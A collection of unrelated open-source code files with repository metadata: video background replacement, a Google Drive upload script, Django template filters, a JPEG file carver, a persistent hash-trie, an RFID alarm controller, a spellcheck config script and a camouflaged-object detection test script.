transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
while(True):
ret, img = cap.read()
if ret:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# Preprocess image
input_img = preprocess(img)
# Creating a batch dimension
input_batch = input_img.unsqueeze(0)
# Inference
output = deeplapv3_101(input_batch)['out'][0]
final_output = output.argmax(dim=0)
# Just keep person class and make everything else background
person_output = torch.zeros_like(final_output)
person_output[final_output == 15] = 1
img_resize = cv2.resize(img,(256,256))
# Get person segmentation
foreground = img_resize * person_output.numpy()[:,:,None]
foreground = foreground.astype(float)
foreground_orig_size = cv2.resize(foreground,(width,height))
# Create alpha mask for blending
th, alpha = cv2.threshold(foreground_orig_size,0,255, cv2.THRESH_BINARY)
# Smooth the edges for smooth blending
alpha = (cv2.GaussianBlur(alpha, (7,7),0))/255
final = foreground_orig_size * alpha + background * (1 - alpha)
final = final[...,::-1]
final = (final).astype(np.uint8)
cv2.imshow('frame',final)
video_download.write(final)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
meetdave06/random-cv-tasks
|
test1/test1.py
|
test1.py
|
py
| 2,455 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "torchvision.models.segmentation.deeplabv3_resnet101",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "torchvision.models.segmentation",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "torchvision.models",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "cv2.imread",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2RGB",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "make_video.make_video",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.Compose",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.ToPILImage",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.Resize",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 49,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.ToTensor",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.Normalize",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "cv2.cvtColor",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2RGB",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "torch.zeros_like",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "cv2.threshold",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "cv2.THRESH_BINARY",
"line_number": 83,
"usage_type": "attribute"
},
{
"api_name": "cv2.GaussianBlur",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 89,
"usage_type": "attribute"
},
{
"api_name": "cv2.imshow",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "cv2.destroyAllWindows",
"line_number": 97,
"usage_type": "call"
}
] |
71904076349
|
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
gauth = GoogleAuth()
gauth.LoadCredentialsFile("mycreds.txt")
if gauth.credentials is None:
gauth.LocalWebserverAuth()
elif gauth.access_token_expired:
gauth.Refresh()
else:
gauth.Authorize()
gauth.SaveCredentialsFile("mycreds.txt")
drive = GoogleDrive(gauth)
file1 = drive.CreateFile({'title': 'Automata.txt'}) # Create GoogleDriveFile instance with title 'Automata.txt'.
file1.SetContentString('Automataaa') # Set content of the file from given string.
file1.Upload()
print(drive)
|
gmagannaDevelop/GlcJournal
|
pydrive/automated_access.py
|
automated_access.py
|
py
| 568 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "pydrive.auth.GoogleAuth",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pydrive.drive.GoogleDrive",
"line_number": 18,
"usage_type": "call"
}
] |
39380382951
|
import datetime
import jpholiday
from django import template
register = template.Library() # Django's template tag library
# Register as custom filters
@register.filter
def get_dict_value(dictionary, key):
return dictionary.get(key)
@register.filter
def append_string(dest, src):
return dest + src
@register.filter
def get_day_class(date):
day_class = ''
    # date is a string in YYYY/MM/DD format
    #d = datetime.strptime(date,'%Y/%m/%d')
    # Workaround: is_holiday does not behave correctly when strptime is used
    # probably because it yields datetime.datetime(2020, 7, 23, 0, 0)?
sp = date.split('/')
day = datetime.date(int(sp[0]), int(sp[1]), int(sp[2]))
if day.weekday() == 5:
        # Saturday
day_class = 'text-primary'
elif day.weekday() == 6 or jpholiday.is_holiday(day):
        # Sunday or public holiday
day_class = 'text-danger'
return day_class
@register.filter
def get_monthly_max(monthly_list):
max_count = 0
for date, count in monthly_list:
max_count = max(max_count, count)
return max_count
|
manakamu/docker
|
django/Docker-Django/django_project/pole/templatetags/pole_tags.py
|
pole_tags.py
|
py
| 1,141 |
python
|
ja
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "django.template.Library",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.template",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "datetime.date",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "jpholiday.is_holiday",
"line_number": 29,
"usage_type": "call"
}
] |
37964221731
|
import sys
import os
import random
from PIL import Image
'''
Simple image carver. Right now it will assemble any and all JPEGs found, including partial fragmented files. It does not recover the rest of a fragmented file.
You must have Pillow installed. You can do that with `pip install pillow`.
YOU MUST HAVE PYTHON 3, NOT 2! The Pillow version used targets Python 3 and I can't guarantee any of this works on Python 2.
'''
def main():
if len(sys.argv) < 2:
print("Invalid input, you must specify a file as the first argument.")
exit(0)
readFile(sys.argv[1])
# Reads file and creates the list of SOI AND EOI markers
def readFile(filename):
startMarkerArr = []
endMarkerArr = []
sosArr = []
counter = 0
fileSize = os.stat(filename).st_size
file = open(filename, 'rb')
fileBuffer = bytearray(file.read())
while counter < fileSize:
byte1 = bytes([fileBuffer[counter]])
byte2 = bytes([fileBuffer[counter+1]])
if findStart(byte1, byte2):
startMarkerArr.append(counter)
if findEnd(byte1, byte2):
endMarkerArr.append(counter)
counter += 2
print("Found markers")
pairs = findPairs(startMarkerArr, endMarkerArr, sosArr)
validCount = buildFile(pairs)
#Finds SOI
def findStart(byte1, byte2):
if byte1 == b'\xFF' and byte2 == b'\xD8':
return True
return False
#Finds EOI
def findEnd(byte1, byte2):
if byte1 == b'\xFF' and byte2 == b'\xD9':
return True
return False
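# Hedged usage sketch (not part of the original carver): findStart/findEnd only
# match the JPEG SOI (FF D8) and EOI (FF D9) marker bytes; the byte string below
# is a minimal illustration, not a valid JPEG.
def _marker_example():
    data = bytearray(b'\xFF\xD8hello\xFF\xD9')
    assert findStart(bytes([data[0]]), bytes([data[1]]))
    assert findEnd(bytes([data[-2]]), bytes([data[-1]]))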
#Creates the pairs of SOI and EOI markers
def findPairs(startMarkerArr, endMarkerArr, sosArr):
markerPairs = []
for startI in range(0, len(startMarkerArr)):
for endI in range(0, len(endMarkerArr)):
if startMarkerArr[startI] < endMarkerArr[endI] + 2:
markerPairs.append((startMarkerArr[startI], endMarkerArr[endI]))
print("Found pairs list size is " + str(len(markerPairs)))
return markerPairs
#Tests all pairs and tests/ deletes invalid images using Pillow/ PIL
# Also tests to see if the discovered file is the smallest of the ones generated from the same SOI
def buildFile(markerPairs):
file = open(sys.argv[1], 'rb')
byteBuffer = file.read()
counter = 0
smallestHashMap = {}
while counter < len(markerPairs):
jpegBytes = bytearray()
start = markerPairs[counter][1]
jpegBytes.extend(byteBuffer[markerPairs[counter][0]:markerPairs[counter][1]+2])
name = str(random.random())
jpegFile = open(name + ".jpg", 'wb+')
jpegFile.write(jpegBytes)
try:
Image.open(name + ".jpg")
except IOError:
os.remove(name + ".jpg")
print("Invalid image removed")
else:
if smallestHashMap.get(markerPairs[counter][0]) != None:
print(len(jpegBytes), smallestHashMap[markerPairs[counter][0]][0])
if counter != 0 and smallestHashMap.get(markerPairs[counter][0]) != None and len(jpegBytes) < smallestHashMap[markerPairs[counter][0]][0]:
print("Smaller image found, duplicate removed!")
os.remove(smallestHashMap[markerPairs[counter][0]][1])
smallestHashMap[markerPairs[counter][0]] = (len(jpegBytes), name + ".jpg")
if smallestHashMap.get(markerPairs[counter][0]) != None and len(jpegBytes) > smallestHashMap[markerPairs[counter][0]][0]:
os.remove(name + ".jpg")
print("Original is the smallest duplicate removed")
if smallestHashMap.get(markerPairs[counter][0]) == None:
smallestHashMap[markerPairs[counter][0]] = (len(jpegBytes), name + ".jpg")
print("One valid image has been added or replaced")
counter += 1
# Run main() when the script is executed directly
if __name__ == '__main__':
main()
|
steviekong/Jpeg_carver
|
carver.py
|
carver.py
|
py
| 3,434 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "sys.argv",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.stat",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "random.random",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "PIL.Image.open",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 75,
"usage_type": "name"
},
{
"api_name": "os.remove",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "os.remove",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "os.remove",
"line_number": 87,
"usage_type": "call"
}
] |
41254027126
|
from copy import copy, deepcopy
from itertools import izip
from burrahobbit.util import all
SENTINEL = object()
SHIFT = 5
BMAP = (1 << SHIFT) - 1
BRANCH = 2 ** SHIFT
MAXBITMAPDISPATCH = 16
def relevant(hsh, shift):
""" Return the relevant part of the hsh on the level shift. """
return hsh >> shift & BMAP
POPCOUNT_TBL = [0] * (2 ** 16)
for idx in xrange(2 ** 16):
POPCOUNT_TBL[idx] = (idx & 1) + POPCOUNT_TBL[idx >> 1]
def bit_count(v):
return (POPCOUNT_TBL[v & 0xffff] +
POPCOUNT_TBL[(v >> 16) & 0xffff])
def doc(docstring):
""" Decorator to set docstring of function to docstring. """
def deco(fn):
""" Implementation detail. """
fn.__doc__ = docstring
return fn
return deco
ASSOC = "\n".join([
    "Add the AssocNode whose key's hash is hsh to the node or its children.",
    "shift refers to the current level in the tree, which must be a multiple",
    "of the global constant SHIFT. If a node with the same key already",
    "exists, override it.",
])
IASSOC = "\n".join([
    "Modify so that the AssocNode whose key's hash is hsh is added to it.",
    "USE WITH CAUTION.",
    "shift refers to the current level in the tree, which must be a multiple",
    "of the global constant SHIFT. If a node with the same key already",
    "exists, override it.",
])
GET = "\n".join([
    "Get value of the AssocNode with key whose hash is hsh in the subtree.",
    "shift refers to the current level in the tree, which must be a multiple",
    "of the global constant SHIFT.",
])
WITHOUT = "\n".join([
    "Remove AssocNode with key whose hash is hsh from the subtree.",
    "shift refers to the current level in the tree, which must be a multiple",
    "of the global constant SHIFT.",
])
IWITHOUT = "\n".join([
    "Modify so that the AssocNode whose key's hash is hsh is removed from it.",
    "USE WITH CAUTION.",
    "shift refers to the current level in the tree, which must be a multiple",
    "of the global constant SHIFT.",
])
class Node(object):
__slots__ = []
def __and__(self, other):
new = NULLNODE
for node in other:
try:
self.get(hash(node.key), 0, node.key)
except KeyError:
pass
else:
new = new._iassoc(hash(node.key), 0, node)
return new
def __xor__(self, other):
new = self
for node in other:
new = new.xor(node.hsh, 0, node)
return new
def __or__(self, other):
new = self
for node in other:
new = new.assoc(node.hsh, 0, node)
return new
def __eq__(self, other):
return all(node == othernode for node, othernode in izip(self, other))
    def __ne__(self, other):
return any(node != othernode for node, othernode in izip(self, other))
class NullNode(Node):
""" Dummy node being the leaf of branches that have no entries. """
__slots__ = []
def xor(self, hsh, shift, node):
return node
_ixor = xor
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# Because there currently no node, the new node
# is the node to be added.
return node
# The NullNode does not need to be modified if a new association is
# created because it only returns the new node, hence _iassoc = assoc.
_iassoc = assoc
def get(self, hsh, shift, key):
# There is no entry with the searched key because the hash leads
# to a branch ending in a NullNode.
raise KeyError(key)
@doc(WITHOUT)
def without(self, hsh, shift, key):
# There is no entry with the key to be removed because the hash leads
# to a branch ending in a NullNode.
raise KeyError(key)
_iwithout = without
def __iter__(self):
# There are no keys contained in a NullNode. Hence, an empty
# iterator is returned.
return iter([])
# Likewise, there are no values and items in a NullNode.
iteritems = itervalues = __iter__
def __copy__(self):
return self
def cutoff(self, hsh):
return self
# We only need one instance of a NullNode because it does not contain
# any data.
NULLNODE = NullNode()
class HashCollisionNode(Node):
""" If hashes of two keys collide, store them in a list and when a key
is searched, iterate over that list and find the appropriate key. """
__slots__ = ['children', 'hsh']
def __init__(self, nodes):
self.children = nodes
self.hsh = hash(nodes[0].hsh)
def xor(self, hsh, shift, node):
if not any(node.key == child.key for child in self.children):
return HashCollisionNode(self.children + [node])
return self
def _ixor(self, hsh, shift, node):
if not any(node.key == child.key for child in self.children):
self.children.append(node)
return self
@doc(GET)
def get(self, hsh, shift, key):
# To get the child we want we need to iterate over all possible ones.
# The contents of children are always AssocNodes,
# so we can safely access the key member.
for node in self.children:
if key == node.key:
return node
raise KeyError(key)
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# If we have yet another key with a colliding key, return a new node
# with it added to the children, otherwise return a DispatchNode.
if hsh == self.hsh:
return HashCollisionNode(self.children + [node])
return DispatchNode.make(shift, [self, node])
@doc(IASSOC)
def _iassoc(self, hsh, shift, node):
# If we have yet another key with a colliding key, add it to the
# children, otherwise return a DispatchNode.
if hsh == self.hsh:
self.children.append(node)
return self
return DispatchNode.make(shift, [self, node])
@doc(WITHOUT)
def without(self, hsh, shift, key):
# Remove the node whose key is key from the children. If it was the
# last child, return NULLNODE. If there was no member with a
# matching key, raise KeyError.
newchildren = [node for node in self.children if node.key != key]
if not newchildren:
return NULLNODE
if newchildren == self.children:
raise KeyError(key)
return HashCollisionNode(newchildren)
@doc(IWITHOUT)
def _iwithout(self, hsh, shift, key):
newchildren = [node for node in self.children if node.key != key]
if not newchildren:
return NULLNODE
if newchildren == self.children:
raise KeyError(key)
self.children = newchildren
return self
def __iter__(self):
for node in self.children:
for elem in node:
yield elem
def __copy__(self):
return HashCollisionNode(map(copy, self.children))
def cutoff(self, hsh):
if self.hsh <= hsh:
return NULLNODE
return self
class ListDispatch(Node):
    """ Lightweight dictionary-like object for a small number of items.
    Only feasible for a small number of items, as a list of length nitems
    is always stored.
    Only accepts integers as keys. """
__slots__ = ['items']
def __init__(self, nitems=None, items=None):
if items is None:
items = [SENTINEL for _ in xrange(nitems)]
self.items = items
def replace(self, key, item):
""" Return a new ListDispatch with the the keyth item replaced
with item. """
return ListDispatch(
None,
self.items[:key] +
[item] +
self.items[key + 1:]
)
def _ireplace(self, key, item):
""" Replace keyth item with item.
USE WITH CAUTION. """
self.items[key] = item
return self
def __getitem__(self, key):
value = self.items[key]
if value is SENTINEL:
raise KeyError(key)
return value
def get(self, key, default):
""" Get keyth item. If it is not present, return default. """
value = self.items[key]
if value is not SENTINEL:
return value
return default
def remove(self, key):
""" Return new ListDispatch with keyth item removed.
Will not raise KeyError if it was not present. """
return self.replace(key, SENTINEL)
def _iremove(self, key):
""" Remove keyth item. Will not raise KeyError if it was not present.
USE WITH CAUTION. """
self._ireplace(key, SENTINEL)
return self
def to_bitmapdispatch(self):
dispatch = BitMapDispatch()
for key, value in enumerate(self.items):
if value is not SENTINEL:
dispatch._ireplace(key, value)
return dispatch
def __iter__(self):
return (item for item in self.items if item is not SENTINEL)
def __copy__(self):
return ListDispatch(items=self.items[:])
    def __deepcopy__(self, memo=None):
        return ListDispatch(items=map(deepcopy, self.items))
def map(self, fn):
newitems = []
for elem in self.items:
if elem is not SENTINEL:
elem = fn(elem)
newitems.append(elem)
return ListDispatch(items=newitems)
class BitMapDispatch(Node):
    """ Lightweight dictionary-like object for a small number of items.
    Best used for at most as many items as an integer has bits (usually 32).
Only accepts integers as keys.
The items are stored in a list and whenever an item is added, the bitmap
is ORed with (1 << key) so that the keyth bit is set.
The amount of set bits before the nth bit is used to find the index of the
item referred to by key in the items list.
"""
__slots__ = ['bitmap', 'items']
def __init__(self, bitmap=0, items=None):
if items is None:
items = []
self.bitmap = bitmap
self.items = items
def replace(self, key, item):
""" Return a new BitMapDispatch with the the keyth item replaced
with item. """
# If the item already existed in the list, we need to replace it.
# Otherwise, it will be added to the list at the appropriate
# position.
if len(self.items) >= MAXBITMAPDISPATCH:
new = self.to_listdispatch(BRANCH)
return new._ireplace(key, item)
notnew = bool(self.bitmap & 1 << key)
newmap = self.bitmap | 1 << key
idx = bit_count(self.bitmap & ((1 << key) - 1))
return BitMapDispatch(
newmap,
# If notnew is True, the item that is replaced by the new item
# is left out, otherwise the new item is inserted. Refer to
# _ireplace for a more concise explanation.
self.items[:idx] + [item] + self.items[idx+notnew:]
)
def _ireplace(self, key, item):
""" Replace keyth item with item.
USE WITH CAUTION. """
if len(self.items) >= MAXBITMAPDISPATCH:
new = self.to_listdispatch(BRANCH)
return new._ireplace(key, item)
notnew = bool(self.bitmap & 1 << key)
self.bitmap |= 1 << key
idx = bit_count(self.bitmap & ((1 << key) - 1))
if idx == len(self.items):
self.items.append(item)
elif notnew:
self.items[idx] = item
else:
self.items.insert(idx, item)
return self
def get(self, key, default=None):
""" Get keyth item. If it is not present, return default. """
if not self.bitmap & 1 << key:
return default
return self.items[bit_count(self.bitmap & ((1 << key) - 1))]
def remove(self, key):
""" Return new BitMapDispatch with keyth item removed.
Will not raise KeyError if it was not present. """
idx = bit_count(self.bitmap & ((1 << key) - 1))
return BitMapDispatch(
# Unset the keyth bit.
self.bitmap & ~(1 << key),
# Leave out the idxth item.
self.items[:idx] + self.items[idx+1:]
)
def _iremove(self, key):
""" Remove keyth item. Will not raise KeyError if it was not present.
USE WITH CAUTION. """
idx = bit_count(self.bitmap & ((1 << key) - 1))
self.bitmap &= ~(1 << key)
self.items.pop(idx)
return self
def __getitem__(self, key):
if not self.bitmap & 1 << key:
raise KeyError(key)
return self.items[bit_count(self.bitmap & ((1 << key) - 1))]
def to_listdispatch(self, nitems):
""" Return ListDispatch with the same key to value connections as this
BitMapDispatch. """
return ListDispatch(
None, [self.get(n, SENTINEL) for n in xrange(nitems)]
)
def __iter__(self):
return iter(self.items)
def __nonzero__(self):
return bool(self.items)
def __copy__(self):
return BitMapDispatch(self.bitmap, self.items[:])
    def __deepcopy__(self, memo=None):
        return BitMapDispatch(self.bitmap, map(deepcopy, self.items))
def map(self, fn):
return BitMapDispatch(
self.bitmap,
[fn(elem) for elem in self.items]
)
class DispatchNode(Node):
""" Dispatch to children nodes depending of the hsh value at the
current level. """
__slots__ = ['children']
def __init__(self, children=None):
if children is None:
children = BitMapDispatch()
self.children = children
def xor(self, hsh, shift, node):
rlv = relevant(hsh, shift)
newchild = self.children.get(rlv, NULLNODE).xor(hsh, shift + SHIFT, node)
if newchild is NULLNODE:
# This makes sure no dead nodes remain in the tree after
# removing an item.
newchildren = self.children.remove(rlv)
if not newchildren:
return NULLNODE
else:
newchildren = self.children.replace(
rlv,
newchild
)
return DispatchNode(newchildren)
def _ixor(self, hsh, shift, node):
rlv = relevant(hsh, shift)
newchild = self.children[rlv].xor(hsh, shift + SHIFT, node)
if newchild is NULLNODE:
self.children = self.children._iremove(rlv)
if not self.children:
return NULLNODE
else:
self.children = self.children._ireplace(rlv, newchild)
return self
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# We need not check whether the return value of
# self.children.get(...).assoc is NULLNODE, because assoc never
# returns NULLNODE.
rlv = relevant(hsh, shift)
return DispatchNode(
self.children.replace(
rlv,
self.children.get(rlv, NULLNODE).assoc(
hsh, shift + SHIFT, node
)
)
)
@doc(IASSOC)
def _iassoc(self, hsh, shift, node):
rlv = relevant(hsh, shift)
self.children = self.children._ireplace(
rlv,
self.children.get(rlv, NULLNODE)._iassoc(hsh, shift + SHIFT, node)
)
return self
@classmethod
def make(cls, shift, many):
# Because the object we create in this function is not yet exposed
# to any other code, we may safely call _iassoc.
dsp = cls()
for elem in many:
dsp = dsp._iassoc(elem.hsh, shift, elem)
return dsp
@doc(GET)
def get(self, hsh, shift, key):
return self.children.get(relevant(hsh, shift), NULLNODE).get(
hsh, shift + SHIFT, key
)
@doc(WITHOUT)
def without(self, hsh, shift, key):
rlv = relevant(hsh, shift)
newchild = self.children[rlv].without(hsh, shift + SHIFT, key)
if newchild is NULLNODE:
# This makes sure no dead nodes remain in the tree after
# removing an item.
newchildren = self.children.remove(rlv)
if not newchildren:
return NULLNODE
else:
newchildren = self.children.replace(
rlv,
newchild
)
return DispatchNode(newchildren)
@doc(IWITHOUT)
def _iwithout(self, hsh, shift, key):
rlv = relevant(hsh, shift)
newchild = self.children[rlv]._iwithout(hsh, shift + SHIFT, key)
if newchild is NULLNODE:
self.children = self.children._iremove(rlv)
if not self.children:
return NULLNODE
else:
self.children = self.children._ireplace(rlv, newchild)
return self
def __iter__(self):
for child in self.children:
for elem in child:
yield elem
def __copy__(self):
return DispatchNode(self.children.map(copy))
|
fmayer/burrahobbit
|
burrahobbit/_tree.py
|
_tree.py
|
py
| 17,423 |
python
|
en
|
code
| 8 |
github-code
|
6
|
[
{
"api_name": "burrahobbit.util.all",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "itertools.izip",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "itertools.izip",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "copy.copy",
"line_number": 233,
"usage_type": "argument"
},
{
"api_name": "copy.deepcopy",
"line_number": 310,
"usage_type": "argument"
},
{
"api_name": "copy.deepcopy",
"line_number": 427,
"usage_type": "argument"
},
{
"api_name": "copy.copy",
"line_number": 551,
"usage_type": "argument"
}
] |
39463837440
|
# Standard library imports
import serial
import time
import sys
import zerorpc
import datetime
# Application library imports
from MySQLhandler import *
import Utility
SCRIPT_NAME = "RFIDhandler"
TIME_BEFORE_ACTIVATION = 60 * 5
print("Initialize serial connection with Arduino")
try:
s = serial.Serial('/dev/ttyACM0', 9600)
except:
error_msg = "Unable to connect to the Arduino"
print(error_msg)
Utility.launch_fatal_process_alert(SCRIPT_NAME, error_msg)
time.sleep(50000) # Wait a moment for a possible fix
sys.exit() # Close the process and hope for a restart (-> supervisor)
# Each variable stores an object capable of inserting, updating and deleting
# in the given table
timeshot = 0
while True:
line = s.readline() # Get the line sent by the Arduino
try:
db_devices = MySQL('devices')
db_alarms = MySQL('alarms')
db_users = MySQL('users')
except:
error_msg = "Unable to connect to the database"
print(error_msg)
Utility.launch_fatal_process_alert(SCRIPT_NAME, error_msg)
time.sleep(50000)
sys.exit()
user = db_users.get('RFID', line.split('\r')[0])
# [user] represents the owner's row of the RFID tag passed
# if it exists
if user:
Utility.switch_led_info(0)
Utility.sound(0)
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
c.RFID()
alarms = db_alarms.all()
state = bool(alarms[0]['state'])
is_one_alarm_up = False
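        # 'state' mirrors the first alarm; if another alarm is armed while the
        # first is not, the set is re-synchronised (all off), otherwise the
        # whole set is armed after a delay or disarmed, depending on 'state'.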
for alarm in alarms:
is_one_alarm_up = is_one_alarm_up or bool(alarm['state'])
if is_one_alarm_up and not state:
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', state)
elif not state:
print("[{}]: Waiting {} sec before activation".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S"), TIME_BEFORE_ACTIVATION))
time.sleep(TIME_BEFORE_ACTIVATION)
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', not state)
elif state:
print("[{}]: Deactivating".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S")))
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', not state)
else:
print("[{}]: Unauthorized tag".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S")))
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
c.RFIDError()
|
jeremyalbrecht/Alarm-RPI
|
RFIDhandler.py
|
RFIDhandler.py
|
py
| 2,490 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "serial.Serial",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "Utility.launch_fatal_process_alert",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "Utility.launch_fatal_process_alert",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "Utility.switch_led_info",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "Utility.sound",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "zerorpc.Client",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "time.sleep",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 65,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "zerorpc.Client",
"line_number": 70,
"usage_type": "call"
}
] |
38049723382
|
import sys
import os
import yaml
import json
CUSTOM_WORD_LIST_FILENAME = '.wordlist.txt'
def find_wordlist_files(path):
wordlist_paths = []
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith(CUSTOM_WORD_LIST_FILENAME):
wordlist_paths.append(os.path.join(root, file))
return wordlist_paths
if __name__ == '__main__':
spell_check_yaml_path = sys.argv[1]
markdown_base_path = sys.argv[2]
spell_check_yaml = None
with open(spell_check_yaml_path, 'r') as read_file:
spell_check_yaml = yaml.load(read_file, Loader=yaml.FullLoader)
wordlist_paths = find_wordlist_files(markdown_base_path)
print("Adding wordlists: ")
print("\n".join(wordlist_paths))
spell_check_yaml['matrix'][0]['dictionary']['wordlists'].extend(wordlist_paths)
with open(spell_check_yaml_path + ".tmp", 'w') as write_file:
        #yaml.dump doesn't work here under Python 3, so we dump to JSON instead & convert using yq in the outer script
#yaml.dump(write_file, spell_check_yaml, Dumper=yaml.Dumper)
json.dump(spell_check_yaml, write_file, indent=4)
|
actions-marketplace-validations/jordanbean-msft_wth-spell-check-action
|
generate-spellcheck.py
|
generate-spellcheck.py
|
py
| 1,153 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.walk",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "yaml.load",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "yaml.FullLoader",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "json.dump",
"line_number": 35,
"usage_type": "call"
}
] |
29059896663
|
import imageio
import torch
import torch.nn.functional as F
import numpy as np
import os, argparse
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from net.bgnet import Net
from utils.tdataloader import test_dataset
parser = argparse.ArgumentParser()
parser.add_argument('--testsize', type=int, default=416, help='testing size')
parser.add_argument('--pth_path', type=str, default='./checkpoints/best/BGNet.pth')
for _data_name in ['CAMO','CHAMELEON','COD10K','NC4K']:
data_path = './data/TestDataset/{}/'.format(_data_name)
save_path = './results/BGNet/{}/'.format(_data_name)
opt = parser.parse_args()
model = Net()
model.load_state_dict(torch.load(opt.pth_path))
model.cuda()
model.eval()
os.makedirs(save_path, exist_ok=True)
os.makedirs(save_path+'edge/', exist_ok=True)
image_root = '{}/Imgs/'.format(data_path)
gt_root = '{}/GT/'.format(data_path)
test_loader = test_dataset(image_root, gt_root, opt.testsize)
for i in range(test_loader.size):
image, gt, name = test_loader.load_data()
gt = np.asarray(gt, np.float32)
gt /= (gt.max() + 1e-8)
image = image.cuda()
_, _, res, e = model(image)
res = F.upsample(res, size=gt.shape, mode='bilinear', align_corners=False)
res = res.sigmoid().data.cpu().numpy().squeeze()
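        # min-max normalise the prediction to [0, 1] before writing it out as an 8-bit image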
res = (res - res.min()) / (res.max() - res.min() + 1e-8)
imageio.imwrite(save_path+name, (res*255).astype(np.uint8))
# e = F.upsample(e, size=gt.shape, mode='bilinear', align_corners=True)
# e = e.data.cpu().numpy().squeeze()
# e = (e - e.min()) / (e.max() - e.min() + 1e-8)
